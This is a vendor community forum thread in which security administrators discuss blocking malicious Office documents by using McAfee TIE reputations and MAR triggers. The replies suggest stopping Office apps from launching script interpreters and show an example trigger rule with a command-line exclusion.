cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 

Integrating TIE Reputations into MAR

Hello,

We recently implemented TIE and MAR into our environment. TIE's reputation building has been very useful, but we have run into one major roadblock: ENS ATP being unable to block MANUALLY IMPORTED REPUTATIONS of .PDF or .DOCX files. 

Our SOC typically will find known malicious files, so our assumption was that we could input all proper hash values of the file, and have the ENS ATP module block these files from being ran. After talking with McAfee Support, I was told this wasn't possible (we would have to use ATD to sandbox the files, then based off of ATD's findings, it could block).

So my thought was: Can I create a collector that somehow pulls in TIE reputations? If so, I could make a trigger that says "If TIE reputation is KNOWN MALICIOUS, then REMOVE FILE". From brief testing, I am able to block .PDF and .DOCX files with MAR, so this could be the solution to our problem.

Maybe there's an easier way? Maybe someone else has already found a way to do this? We are just looking to fully utilize our new products.

5 Replies
malware-alerts
Reliable Contributor
Reliable Contributor
Report Inappropriate Content
Message 2 of 6

Re: Integrating TIE Reputations into MAR

Hi Brett,

 

Did you get any input on this one? I'd be curious to know if you were able to achieve what you're trying to achieve.

Let me know.

Thanks

Re: Integrating TIE Reputations into MAR

Hi.

Unfortunately, I have not received any information. I have a case open with McAfee Enterprise Support regarding MAR triggers in general, so hopefully I can pose this question to the Support representatives and get some guidance. Will report back any further info!

Re: Integrating TIE Reputations into MAR

TIE only works with PE files at the client level,  so it won't be able to help. 

About the only way to do what you are wanting is through a script reaction utilizing the APIs.  It probably isn't the best solution. 

Your best bet is to use MAR to block the behavior of the macros with Triggers,  so blocking Office from executing cmd, powershell,  regsvr32,Mshta, wscript, etc.   If you find false positives in your environment whitelist by cmdline. Taking this approach you protect yourself from the known and unknown.   Be sure to watch dropped Files with wmi executions, scheduled task runs and registry run/runonce as well through correlation rules.  

Not the answer you wanted I'm sure but hopefully helpful. 

 

Re: Integrating TIE Reputations into MAR

Hi Dave,

I'm currently playing around with MAR triggers to block Office from executing cmd,powershell and such. Now I don't want to block them right away but just report on them first to see what kind of impact that will have. Once I find the false positives, I'm not sure how I would exclude those from those triggers, do you have any example on how you'd whitelist by cmdline as you're suggesting?
I haven't really seen a way to exclude stuff from MAR triggers.

Thanks.

Re: Integrating TIE Reputations into MAR

Sure...  for example, you might say:

Process name equals "cmd.exe" and Process parentname equals "winword.exe" and Process cmdline not contains "IKnowThisIsNormal"

You can also do "Process parent_cmdline not contains" as well, or the various other parameters.  

You Deserve an Award
Don't forget, when your helpful posts earn a kudos or get accepted as a solution you can unlock perks and badges. Those aren't the only badges, either. How many can you collect? Click here to learn more.

Community Help Hub

    New to the forums or need help finding your way around the forums? There's a whole hub of community resources to help you.

  • Find Forum FAQs
  • Learn How to Earn Badges
  • Ask for Help
Go to Community Help

Join the Community

    Thousands of customers use the McAfee Community for peer-to-peer and expert product support. Enjoy these benefits with a free membership:

  • Get helpful solutions from McAfee experts.
  • Stay connected to product conversations that matter to you.
  • Participate in product groups led by McAfee employees.
Join the Community
Join the Community